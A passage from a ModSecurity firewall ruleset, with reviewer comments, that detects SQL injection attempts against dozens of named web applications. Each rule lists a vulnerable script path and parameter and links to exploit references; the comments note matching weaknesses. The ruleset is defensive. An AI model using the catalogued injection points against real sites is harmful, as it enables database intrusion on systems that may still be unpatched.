REQUEST_LINE "@contains /info_user.asp" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005151,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Forum Livre SQL Injection Attempt -- info_user.asp user UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3197'" SecRule &TX:'/SQL_INJECTION.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Forum Livre SQL Injection Attempt -- info_user.asp user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004923) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fullaspsite ASP Hosting Site SQL Injection Attempt -- listmain.asp cat UPDATE SecRule REQUEST_LINE "@contains /listmain.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004923,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Fullaspsite ASP Hosting Site SQL Injection Attempt -- listmain.asp cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22545'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fullaspsite ASP Hosting Site SQL Injection Attempt -- listmain.asp cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005080) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fullaspsite Asp Hosting Sitesi SQL Injection Attempt -- windows.asp kategori_id UPDATE SecRule REQUEST_LINE "@contains /windows.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005080,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Fullaspsite Asp Hosting Sitesi SQL Injection Attempt -- windows.asp kategori_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3233'" SecRule 
&TX:'/SQL_INJECTION.*ARGS:kategori_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fullaspsite Asp Hosting Sitesi SQL Injection Attempt -- windows.asp kategori_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005377) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fullaspsite GeometriX Download Portal SQL Injection Attempt -- down_indir.asp id UPDATE SecRule REQUEST_LINE "@contains /down_indir.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005377,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Fullaspsite GeometriX Download Portal SQL Injection Attempt -- down_indir.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4057'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fullaspsite GeometriX Download Portal SQL Injection Attempt -- down_indir.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006466) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FuseTalk SQL Injection Attempt -- index.cfm UPDATE SecRule REQUEST_LINE "@contains /index.cfm" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006466,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS FuseTalk SQL Injection Attempt -- index.cfm UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24498'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FuseTalk SQL Injection Attempt -- index.cfm UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006472) SpiderLabs Research (SLR) 
Public Vulns: ET WEB_SPECIFIC_APPS FuseTalk SQL Injection Attempt -- autherror.cfm errorcode UPDATE SecRule REQUEST_LINE "@contains /forum/include/error/autherror.cfm" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006472,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS FuseTalk SQL Injection Attempt -- autherror.cfm errorcode UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24528'" SecRule &TX:'/SQL_INJECTION.*ARGS:errorcode/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FuseTalk SQL Injection Attempt -- autherror.cfm errorcode UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006194) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm newsId UPDATE SecRule REQUEST_LINE "@contains /index.cfm" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006194,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm newsId UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21727'" SecRule &TX:'/SQL_INJECTION.*ARGS:newsId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm newsId UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006200) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm categoryid UPDATE SecRule REQUEST_LINE "@contains /index.cfm" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006200,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm 
categoryid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21727'" SecRule &TX:'/SQL_INJECTION.*ARGS:categoryid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm categoryid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006206) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm langId UPDATE SecRule REQUEST_LINE "@contains /index.cfm" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006206,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm langId UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21727'" SecRule &TX:'/SQL_INJECTION.*ARGS:langId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Future Internet SQL Injection Attempt -- index.cfm langId UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005335) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fuzzylime Forum SQL Injection Attempt -- low.php topic UPDATE SecRule REQUEST_LINE "@contains /low.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005335,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Fuzzylime Forum SQL Injection Attempt -- low.php topic UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4062'" SecRule &TX:'/SQL_INJECTION.*ARGS:topic/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fuzzylime Forum SQL Injection Attempt -- low.php topic UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" 
# ---------------------------------------------------------------------------
# Review notes for the SLR application-specific rules in this section.
#
# Each rule is a chain. The first SecRule matches the application path as a
# substring of REQUEST_LINE. The chained SecRule counts TX variables whose
# names match /SQL_INJECTION.*ARGS:<param>/ and fires when at least one
# exists; it then adds tx.critical_anomaly_score to tx.anomaly_score.
# Those TX variables are presumably written by the generic SQL injection
# rules, so these chains depend on being evaluated after them in phase 2 --
# confirm the include order.
#
# The parameter regex has no end anchor, so ARGS:id also matches any longer
# parameter name that begins with "id", and short paths such as /index.php
# or /default.asp match unrelated applications. Scope these rules to the
# hosts/locations that actually run the named product where possible.
#
# "UPDATE" appears only in the msg text; the TX-count condition itself does
# not test for that keyword.
# ---------------------------------------------------------------------------

# (2004004) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Gazi Download Portal SQL Injection Attempt -- down_indir.asp id UPDATE
SecRule REQUEST_LINE "@contains /down_indir.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004004,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Gazi Download Portal SQL Injection Attempt -- down_indir.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23714'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Gazi Download Portal SQL Injection Attempt -- down_indir.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004402) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GaziYapBoz Game Portal SQL Injection Attempt -- kategori.asp kategori UPDATE
SecRule REQUEST_LINE "@contains /kategori.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004402,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS GaziYapBoz Game Portal SQL Injection Attempt -- kategori.asp kategori UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3437'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:kategori/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GaziYapBoz Game Portal SQL Injection Attempt -- kategori.asp kategori UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005014) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GlobalMegaCorp dvddb SQL Injection Attempt -- common.php user UPDATE
SecRule REQUEST_LINE "@contains /inc/common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005014,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS GlobalMegaCorp dvddb SQL Injection Attempt -- common.php user UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/459151/100/0/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:user/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GlobalMegaCorp dvddb SQL Injection Attempt -- common.php user UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2003845) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Glossaire SQL Injection Attempt -- glossaire-p-f.php sid UPDATE
SecRule REQUEST_LINE "@contains /glossaire-p-f.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003845,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Glossaire SQL Injection Attempt -- glossaire-p-f.php sid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3932'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Glossaire SQL Injection Attempt -- glossaire-p-f.php sid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004354) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- userdetail.php id UPDATE
SecRule REQUEST_LINE "@contains /userdetail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004354,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- userdetail.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22911'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- userdetail.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004360) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- jump.php id UPDATE
SecRule REQUEST_LINE "@contains /jump.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004360,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- jump.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22911'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- jump.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004366) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- detail.php id UPDATE
SecRule REQUEST_LINE "@contains /detail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004366,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- detail.php id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22911'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- detail.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004372) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- jump.php url UPDATE
SecRule REQUEST_LINE "@contains /jump.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004372,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- jump.php url UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22911'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:url/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Grayscale Blog SQL Injection Attempt -- jump.php url UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2011266) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Group-Office comment_id Parameter UPDATE SET SQL Injection Attempt
# NOTE(review): four-rule chain. The method test is a substring match
# ("GET " anywhere in REQUEST_LINE); REQUEST_METHOD would state the intent
# exactly. Only the first rule carries id, phase and the disruptive action,
# and this rule has no reference url tag.
SecRule REQUEST_LINE "@contains /modules/comments/json.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011266,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Group-Office comment_id Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule REQUEST_LINE "@contains task=comment" "chain"
    SecRule &TX:'/SQL_INJECTION.*ARGS:comment_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Group-Office comment_id Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005226) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Guo Xu Guos Posting System (GPS) SQL Injection Attempt -- print.asp id UPDATE
SecRule REQUEST_LINE "@contains /print.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005226,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Guo Xu Guos Posting System (GPS) SQL Injection Attempt -- print.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3195'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Guo Xu Guos Posting System (GPS) SQL Injection Attempt -- print.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007409) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HIOX Star Rating System Script (HSRS) SQL Injection Attempt -- addrating.php ipadd UPDATE
SecRule REQUEST_LINE "@contains /addrating.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007409,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS HIOX Star Rating System Script (HSRS) SQL Injection Attempt -- addrating.php ipadd UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4689'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:ipadd/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HIOX Star Rating System Script (HSRS) SQL Injection Attempt -- addrating.php ipadd UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2007415) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HIOX Star Rating System Script (HSRS) SQL Injection Attempt -- addrating.php url UPDATE
SecRule REQUEST_LINE "@contains /addrating.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007415,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS HIOX Star Rating System Script (HSRS) SQL Injection Attempt -- addrating.php url UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/4689'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:url/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HIOX Star Rating System Script (HSRS) SQL Injection Attempt -- addrating.php url UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004426) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hazir Site SQL Injection Attempt -- giris_yap.asp sifre UPDATE
SecRule REQUEST_LINE "@contains /giris_yap.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004426,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Hazir Site SQL Injection Attempt -- giris_yap.asp sifre UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/20375'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:sifre/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hazir Site SQL Injection Attempt -- giris_yap.asp sifre UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004634) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hunkaray Okul Portaly SQL Injection Attempt -- haberoku.asp id UPDATE
SecRule REQUEST_LINE "@contains /haberoku.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004634,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Hunkaray Okul Portaly SQL Injection Attempt -- haberoku.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24288'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hunkaray Okul Portaly SQL Injection Attempt -- haberoku.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005068) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UPDATE
SecRule REQUEST_LINE "@contains /oku.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005068,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3241'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005644) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- dispimage.asp id UPDATE
SecRule REQUEST_LINE "@contains /dispimage.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005644,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- dispimage.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21131'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- dispimage.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005650) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- default.asp order UPDATE
SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005650,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- default.asp order UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21131'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:order/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- default.asp order UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005656) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- default.asp page UPDATE
SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005656,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- default.asp page UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21131'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:page/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Image Gallery with Access Database SQL Injection Attempt -- default.asp page UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006867) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- rating.asp id UPDATE
SecRule REQUEST_LINE "@contains /rating.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006867,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- rating.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451970/100/200/threaded'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- rating.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006873) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- meal_rest.asp mealid UPDATE
SecRule REQUEST_LINE "@contains /meal_rest.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006873,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Infinitytechs Restaurants CM SQL Injection Attempt -- meal_rest.asp mealid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/451970/100/200/threaded'"
